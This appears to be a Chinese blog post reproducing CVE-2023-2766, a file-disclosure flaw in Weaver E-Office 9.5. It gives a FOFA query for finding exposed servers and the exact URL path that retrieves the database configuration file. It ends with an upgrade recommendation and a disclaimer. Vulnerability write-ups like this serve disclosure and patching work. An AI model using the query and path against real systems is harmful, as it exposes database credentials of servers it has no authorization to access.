当前位置: 首页 > news >正文

泛微E-Office信息泄露漏洞复现

news 2025/8/16 14:39:55

简介

Weaver E-Office是中国泛微科技(Weaver)公司的一个协同办公系统。

Weaver E-Office 9.5版本存在安全漏洞。攻击者利用该漏洞可以访问文件或目录。

漏洞编号:CVE-2023-2766

漏洞复现

FOFA语法:

app="泛微-EOffice"

访问界面如下:

POC:/building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini

拼接URL进行访问:

https://IP:PORT//building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini

成功访问到数据库配置文件。

修复建议

厂商已发布升级补丁以修复漏洞,升级至新版本

免责声明

文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!!!

结语

没有人规定,一朵花一定要成长为向日葵或者玫瑰。

http://www.lryc.cn/news/227116.html

相关文章:

  • -bash: sudo: command not found的解决方法
  • CMOS介绍
  • 《软件工程与计算》期末考试真题范例及答案
  • springboot高校全流程考勤系统-计算机毕设 附源码 27637
  • 大二第四周总结——用原生js封装一个分页器
  • 智能AI系统ChatGPT系统源码+支持GPT4.0+支持ai绘画(Midjourney)/支持OpenAI GPT全模型+国内AI全模型
  • ARM Linux 基础学习 / 系统相关,文件系统,文件属性
  • nginx https 如何将部分路径转移到 http
  • 算法通关村第八关-白银挑战二叉树的深度和高度问题
  • 使用LogBack替换Log4j
  • 财务报告是什么
  • SOME/IP 协议介绍(四)RPC协议规范
  • PostgreSQL基础入门
  • Django 密码管理:安全实践与技术深入
  • 说说你对React Router的理解?常用的Router组件有哪些?
  • “可一学院”新课程《区块链企业应用》正式上线
  • Springboot---整合对象储存服务MinIO
  • HDRP图形入门:HDRP渲染管线depth翻转
  • uniapp——项目02
  • Go语言的Json序列化与反序列化、Goto语法、Tcp Socket通信
  • gitlab-ce-12.3.5 挖矿病毒及解决方案
  • 每日一题(LeetCode)----数组--移除元素(四)
  • 421. 数组中两个数的最大异或值/字典树【leetcode】
  • C++(20):自定义类型实现基于范围的for循环
  • Linux常用命令:find、grep、vim、cat、less、more
  • Oracle导入,注意事项
  • 【数据结构】入队序列出队序列问题(以21年408真题举例)
  • 在ant构建脚本中调用maven的命令
  • 美格智能5G RedCap模组顺利完成中国联通5G物联网OPENLAB开放实验室认证
  • Git基础知识学习常用命令一